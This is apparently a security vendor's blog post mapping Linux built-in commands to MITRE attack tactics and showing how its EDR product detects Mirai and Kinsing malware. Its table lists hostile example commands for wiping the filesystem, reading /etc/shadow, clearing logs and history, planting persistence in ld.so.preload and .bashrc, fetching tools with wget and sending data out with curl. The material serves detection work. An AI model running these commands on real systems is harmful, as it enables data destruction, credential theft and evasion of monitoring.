Uptycs' threat research team has observed several instances of Linux malware where the attackers leverage the inbuilt commands and utilities for a wide range of malicious activities.
In this post, we’ll take a look at the Linux commands and utilities commonly used by attackers and how you can use Uptycs EDR detection capabilities to find if these have been used in your environment.
Around since the mid-1990s and now spanning the globe, Linux is an operating system running most of the internet, all of the world’s top 500 supercomputers, the world’s stock exchanges, and in most phones, thermostats, cars, refrigerators, roku devices, and televisions. A platform of choice and adjacent to iOS and Mac OS, Linux has been deemed the most reliable, secure, and worry-free operating systems to run desktops, servers, and embedded systems across the globe available. An example of Linux’s technological reach, Android’s platform is powered by the Linux operating system.
Comprised of sections including bootloader, kernels, init systems, daemons, graphical server, desktop environments, and applications, the Linux operating system is ultimately chosen for it’s seamlessness in battling viruses, malware, slow run time, crashes, costly repairs, and licensing fees, posited as one of the most reliable computer ecosystems on the planet - and with zero cost of entry.
A program or utility that runs on the command line, a Linux command is a directive to an interface (command line) that accepts lines of text and processes them into instructions for your computer. Any graphical user interface (GUI) is just an abstraction of common-line programs.
In Linux, several utilities and commands are configured by default. Once an adversary gains access to the system, they can leverage these commands and utilities to get their malware up and loaded quickly with full system privileges. And since these commands and utilities are used by users on a daily basis, it can be extremely difficult to detect malicious activities if they have been used for malicious purposes.
Using the data sources from customer telemetry, MITRE mapping of the detection alerts, threat intelligence systems and our in-house osquery-based sandbox, we identified around 25 commands and utilities that are most commonly used by attackers.
Uptycs EDR has detected and identified malware abusing these commands and utilities using the following MITRE tactics:
We drill down and take a closer look at a few examples in the table below.
Using Uptycs EDR, we discovered the Linux commands most commonly used by attackers and mapped them to the techniques and tactics used by bad actors. Below is a list of commonly exploited commands and utilities.
|
Command / Utility |
Techniques |
Tactics |
Example |
|
arp |
Remote System Discovery |
Discovery |
arp -a |
|
users |
System Owner/User Discovery |
Discovery |
users |
|
netstat |
System Network Connections Discovery Linux |
Discovery |
netstat -plntu |
|
uname |
List OS Information |
Discovery |
uname -a |
|
groups |
Enumerate users and groups |
Discovery |
groups |
|
tcpdump |
Packet Capture Linux |
Discovery |
tcpdump -n > output |
|
LD_PRELOAD=#{path_to_shared_library} ls |
Shared Library Injection via LD_PRELOAD |
Persistence, Privilege Escalation, Defense Evasion |
LD_PRELOAD=”/tmp/wqs.so” /bin/ls |
|
insmod |
Loadable Kernel Module based Rootkit |
Persistence |
sudo insmod rootkit.ko |
|
modprobe |
Loadable Kernel Module based Rootkit |
Persistence |
sudo modprobe -r rootkit.ko |
|
useradd |
Create a user account on a Linux System |
Persistence |
useradd –g 500 –u 500 –s /usr/local/bin/nocando –d /var/spool/vmail |
|
crontab |
Schedule task/Job using cron |
Persistence |
crontab - |
|
rm |
Delete Filesystem - Linux Delete Log Files |
Impact |
rm -rf / --no-preserve-root rm -rf /var/logs |
|
kill/pkill |
Kill EDR processes |
Impact |
kill -9 1234 |
|
lsmod |
Linux VM Check via Kernel Modules |
Defense evasion |
sudo lsmod | grep -i "vboxsf\|vboxguest" |
|
systemctl |
Stop edr services on Linux |
Defense evasion |
systemctl stop daemon |
|
curl |
Malicious User Agents |
Command and Control |
curl -XPOST #{base64_data}.#{destination_url} |
|
wget |
Ingress Tool Transfer |
Command and Control |
wget http://{IP}:1337/file.sh |
|
chattr |
File attributes/permissions modification |
Defense Evasion |
chattr -i /etc/ld.so.preload |
|
/etc/shadow |
Access /etc/shadow (Local) |
Persistence, Credential Access |
sudo cat /etc/shadow > file |
|
/etc/passwd |
Access /etc/passwd (Local) Enumerate all accounts |
Persistence |
cat /etc/passwd > file |
|
~/.bash_history |
Clear Bash history Access Bash history |
Credential Access, Defense Evasion |
echo “” > ~/.bash_history |
|
/etc/sudoers |
View sudoers access |
Privilege Escalation |
vim /etc/sudoers |
|
~/.bashrc |
.bash_profile and .bashrc |
Persistence |
echo “/tmp/qwer” >> ~/.bashrc |
|
~/.bash_profile |
.bash_profile and .bashrc |
Persistence |
echo “/tmp/qwer” >> ~/.bash_profile |
|
/etc/ld.so.preload |
Hijack Execution Flow |
Persistence, Privilege Escalation, Defense Evasion |
echo “/tmp/a.so” >> /etc/ld.so.preload |
Table: Commonly exploited Linux commands/utilities
Here’s a closer look at some of the most recent and commonly seen malware using the above commands and utilities.
Mirai is a malware that turns networked devices running Linux into remotely controlled bots that can be used as part of a botnet in large-scale network attacks. In the attack kill chain, the adversary downloads the initial shell script on the target system which then executes wget and curl to drop the Mirai binaries for different architectures and executes them. (See Figure 1)
Figure 1: Mirai malware executing wget and curl activities. (Click to see larger version.)
Uptycs EDR detected the curl and wget activities performed by the malware and also the process activity of Mirai. (See Figure 2)
Figure 2: Uptycs Detection for wget and curl activities by Mirai. (Click to see larger version.)
Kinsing is a malware that targets misconfigured Docker services and infects them to run crypto miners. The initial phase of the malware is to download and execute the shell script which then modifies /etc/ld.so.preload and also executes crontab for achieving persistence. (See Figure 3 and 4)
Uptycs EDR detected the Kinsing malware executing crontab and chattr commands for persistence and defense evasion. (See Figure 5)
In addition to the linux commands and utilities used by Mirai and Kinsing, Uptycs EDR also labelled the threat using process scanning with 10/10 risk score.
Most Linux servers are used for hosting services mostly using SSH. If SSH is not configured properly, the adversaries may gain access into servers using various techniques like exploiting weak credentials. Once the adversaries get access to the target system, their initial goal is to extract system information for further stages like Exploitation, Privilege Escalation or Persistence. Commands like uname, users, groups, netstat, etc. are most commonly used for initial investigation.
Uptycs EDR detects all the post activities after successful SSH login on our target system. (See Figure 6)
Figure 6: Uptycs Detection for Discovery Techniques. (Click to see larger version.)
By exploiting Linux commands that are used for daily operations, it’s possible that their use for malicious activities are often left unnoticed and stay under the radar. Linux Enterprise administrators should regularly monitor the list of the most commonly used commands in the list above for any suspicious/malicious activities in the system. Current Uptycs customers can see a full list of Event Rules below.
Not currently using Uptycs? Check out this short demo to learn a little more about how we can help solve your key Linux security challenges,
The following Uptycs EDR rules are already available to customers to detect above mentioned techniques: